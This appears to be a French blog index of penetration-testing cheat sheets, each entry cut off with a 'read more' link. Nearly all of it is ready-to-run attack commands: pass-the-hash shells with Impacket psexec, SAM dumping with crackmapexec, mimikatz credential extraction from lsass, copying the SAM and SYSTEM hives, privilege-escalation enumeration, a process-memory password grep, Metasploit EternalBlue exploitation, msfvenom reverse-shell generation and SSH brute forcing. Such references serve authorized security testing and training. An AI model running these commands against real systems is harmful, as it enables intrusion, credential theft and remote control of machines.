Scan réseau

Déterminer les hôtes d’un sous-réseau # nmap -n -sn -PR 192.168.2.0/24 Déterminer les noms d’hôtes à partir d’adresse IP faisant partie d’un sous-réseau (Requête DNS inversée) # nmap -sL 192.168.2.0/24 #Déterminer les hôtes actifs en utilisant les techniques ARP, ICMP, SYN 443/tcp, ACK 80/tcp) # nmap -sn -n 192.168.2.0/24 TCP scan (SYN scan) # nmap … Continuer la lecture

Se connecter à un ordinateur avec un hash (récupéré avec mimikatz)

Obtenir un Shell via pass-the-hash (Impacket Tools) # ./psexec.py -hashes :thehash domaine/usager@192.168.2.22 Obtenir le fichier sam des ordinateurs d’un sous-réseau # crackmappexec -u Administrator -H :thehash 10.5.24.0/24 –sam Obtenir les partages avec pass-the-hash. smbclient.py est un outil de Impacket # ./smbclient.py domaine/usager@192.168.2.99 -hashes :hash Obtenir un remote desktop via pass-the-hash # xfreerdp /u:usage /d:domaine /pth: … Continuer la lecture

Obtenir des identifiants et mot de passe Windows

Démarrer Mimikatz et créer un fichier de log # mimikatz.exe # privilege::debug # log c:\temp\mylog.log Lire la mémoire du processus lsass.exe (avec procdump ou taskmgr) # sekurlsa::minidump lsass.dmp Montrer les mots de passe / hashes des usagers connectés # sekurlsa::logonpasswords Copier les clés de registre SYSTEM et SAM # reg save HKLM\SYSTEM system.hiv # reg … Continuer la lecture

Escalade de privilèges sous Windows

PowerSploit Pour trouver des services exploitables ou des DLL ou des clés de registre qui peuvent être exploités # powershell.exe -nop -exec bypass # import-module .\powerup.ps1 # Invoke-AllChecks Autres outils pour trouver des exploits pour élever vos droits et avoir davantage de privilèges: Windows Exploit Suggester New Generation (wesng) Ajouter un administrateur local # net … Continuer la lecture

Escalade de privilèges avec Linux

Voir l’information qui peut nous permettre d’escalader nos privilèges vers un shell administrateur # curl -o /LinEnum https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh # bash ./linEnum -r /tmp/report Vérifier les protections utilisés https://raw.githubusercontent.com/germainm/check_linux_defenses/main/enumerate_linux_defenses.sh Extraire la mémoire d’un processus à la recherche de mots de passe #!/bin/bash #./dump-memory.sh <PID> grep rw-p /proc/$1/maps \     | sed -n 's/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p' \     | … Continuer la lecture

Outils HTTP

Démarrer un serveur Python sur le port 1337 # python3 -m http.server 1337 Performer une requête HTTP # curl http://www.searchevolution.com Options CURL -k: accepte les certificats même s’ils ne sont pas vérifiés par un autorité (self-signed) -d “param1=test” : données HTTP POST -H “Accept-Encoding: gzip, deflate” : entêtes HTTP -I : requête HTTP HEAD -L … Continuer la lecture

Le framework Metasploit

Démarrer Metasploit # msfconsole Chercher un exploit: # search eternalblue Utiliser un exploit # use exploit/windows/smb/ms17_010_eternalblue Configurer les paramètres de l’exploit # show options # set TARGET 192.168.2.55 Exécuter l’exploit # exploit Générer le code pour un reverse SHELL (WAR). Pour hacker un serveur Apache Tomcat # msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.2.33 LPORT=443 -f war > … Continuer la lecture

Cracker des mots de passe

Essayer une attaque bruteforce pour le service SSH avec une liste de mots de passe # ncrack -p 22 –user root -P ./motdepasse.txt 192.168.2.0/24 Déterminer le type de hash # hashid thehash Montre des examples de hash # hashcat –example-hashes | grep -A2 -B2 rar Cracker des hash (par exemple rar: 13000) # hashcat -m … Continuer la lecture